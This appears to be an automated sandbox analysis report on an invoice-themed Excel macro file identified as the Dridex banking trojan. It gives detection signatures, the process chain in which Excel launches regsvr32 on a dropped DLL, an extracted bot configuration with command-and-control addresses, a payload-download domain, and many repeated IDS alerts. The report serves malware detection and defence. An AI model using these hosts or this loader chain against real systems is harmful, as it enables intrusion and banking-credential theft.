Play interactive tour

Edit tour

Analysis Report INV8222874744_20210111490395.xlsm

Overview

General Information

Sample Name:	INV8222874744_20210111490395.xlsm
Analysis ID:	338363
MD5:	032734a3c93c44855955d4769b7ded98
SHA1:	f38cd18659e0fb5d862bac1d9f24691dda4a292c
SHA256:	1e66c639f157fa066c2e4070a46cb0af32548f4fba63684120513433059cd26d
Tags:	Dridexxlsm
Most interesting Screenshot:

Detection

Hidden Macro 4.0 Dridex

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected Dridex e-Banking trojan

Document exploit detected (creates forbidden files)

Document exploit detected (drops PE files)

Found malware configuration

Multi AV Scanner detection for submitted file

Sigma detected: BlueMashroom DLL Load

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Document contains an embedded VBA macro which may execute processes

Document exploit detected (UrlDownloadToFile)

Document exploit detected (process start blacklist hit)

Found Excel 4.0 Macro with suspicious formulas

Machine Learning detection for dropped file

Office process drops PE file

Sigma detected: Microsoft Office Product Spawning Windows Shell

Sigma detected: Regsvr32 Anomaly

Adds / modifies Windows certificates

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality to query network adapater information

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Document contains an embedded VBA macro which executes code when the document is opened / closed

Document contains embedded VBA macros

Dropped file seen in connection with other malware

Drops PE files

Drops certificate files (DER)

Drops files with a non-matching file extension (content does not match file extension)

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the installation date of Windows

Registers a DLL

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w7x64

EXCEL.EXE (PID: 2288 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

regsvr32.exe (PID: 2548 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\bjcbglsw.dll. MD5: 59BCE9F07985F8A4204F4D6554CFF708)

regsvr32.exe (PID: 2540 cmdline: -s C:\Users\user\AppData\Local\Temp\bjcbglsw.dll. MD5: 432BE6CF7311062633459EEF6B242FB5)

DW20.EXE (PID: 2460 cmdline: 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 2456 MD5: 45A078B2967E0797360A2D4434C41DB4)

DWWIN.EXE (PID: 2304 cmdline: C:\Windows\system32\dwwin.exe -x -s 2456 MD5: 25247E3C4E7A7A73BAEEA6C0008952B1)

cleanup

Malware Configuration

Threatname: Dridex

{"Config: ": ["--------------------------------------------------", "BOT ID", "--------------------------------------------------", "Bot id : 30341", "--------------------------------------------------", "IP Address table", "--------------------------------------------------", "Address count 8", "59.206.114.228:65153", "255.255.255.127:5491", "15.183.20.119:53893", "15.132.203.2:0", "70.129.254.255:65535", "127.114.235.190:65535", "255.127.104.242:15033", "162.104.101.15:41265"]}

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: BlueMashroom DLL Load

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\bjcbglsw.dll., CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\bjcbglsw.dll., CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2288, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\bjcbglsw.dll., ProcessId: 2548

Sigma detected: Microsoft Office Product Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\bjcbglsw.dll., CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\bjcbglsw.dll., CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2288, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\bjcbglsw.dll., ProcessId: 2548

Sigma detected: Regsvr32 Anomaly

Show sources

Source: Process started

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 4.2.regsvr32.exe.3a0000.2.raw.unpack

Malware Configuration Extractor: Dridex {"Config: ": ["--------------------------------------------------", "BOT ID", "--------------------------------------------------", "Bot id : 30341", "--------------------------------------------------", "IP Address table", "--------------------------------------------------", "Address count 8", "59.206.114.228:65153", "255.255.255.127:5491", "15.183.20.119:53893", "15.132.203.2:0", "70.129.254.255:65535", "127.114.235.190:65535", "255.127.104.242:15033", "162.104.101.15:41265"]}

Multi AV Scanner detection for submitted file

Show sources

Source: INV8222874744_20210111490395.xlsm

ReversingLabs: Detection: 42%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hhsz1e0[1].rar	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\bjcbglsw.dll	Joe Sandbox ML: detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 217.174.149.3:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49170 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49174 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49178 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49182 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49186 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49190 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49194 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49198 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49202 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49206 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49210 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49214 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49218 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49222 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49226 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49232 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49236 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49240 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49244 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49248 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49252 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49256 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49260 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49264 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49268 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49272 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49276 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49280 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49284 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49288 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49292 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49296 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49300 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49304 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49308 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49312 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49316 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49320 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49324 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49328 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49332 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49336 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49340 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49344 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49348 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49352 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49356 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49360 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49364 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49368 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49372 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49376 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49380 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49384 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49388 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49392 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49396 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49400 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49404 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49408 version: TLS 1.2

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 4_2_003CCEF8 FindFirstFileExW,

4_2_003CCEF8

Software Vulnerabilities:

Document exploit detected (creates forbidden files)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\bjcbglsw.dll

Jump to behavior

Document exploit detected (drops PE files)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: hhsz1e0[1].rar.0.dr

Jump to dropped file

Document exploit detected (UrlDownloadToFile)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA

Jump to behavior

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\regsvr32.exe

Jump to behavior

Source: global traffic

DNS query: name: media-server.skyinternet.com.pk

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 217.174.149.3:443

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 217.174.149.3:443

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49170
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49171
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49172
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49172
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49174
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49175
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49176
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49176
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49178
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49179
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49180
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49180
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49182
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49183
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49184
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49184
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49186
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49187
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49188
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49188
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49190
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49191
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49192
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49192
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49194
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49195
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49196
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49196
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49198
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49199
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49200
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49200
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49202
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49203
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49204
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49204
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49206
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49207
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49208
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49208
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49210
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49211
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49212
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49212
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49214
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49215
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49216
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49216
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49218
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49219
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49220
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49220
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49222
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49223
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49224
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49224
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49226
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49228
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49229
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49229
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49232
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49233
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49234
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49234
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49236
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49237
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49238
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49238
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49240
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49241
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49242
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49242
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49244
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49245
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49246
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49246
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49248
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49249
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49250
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49250
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49252
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49253
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49254
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49254
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49256
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49257
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49258
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49258
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49260
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49261
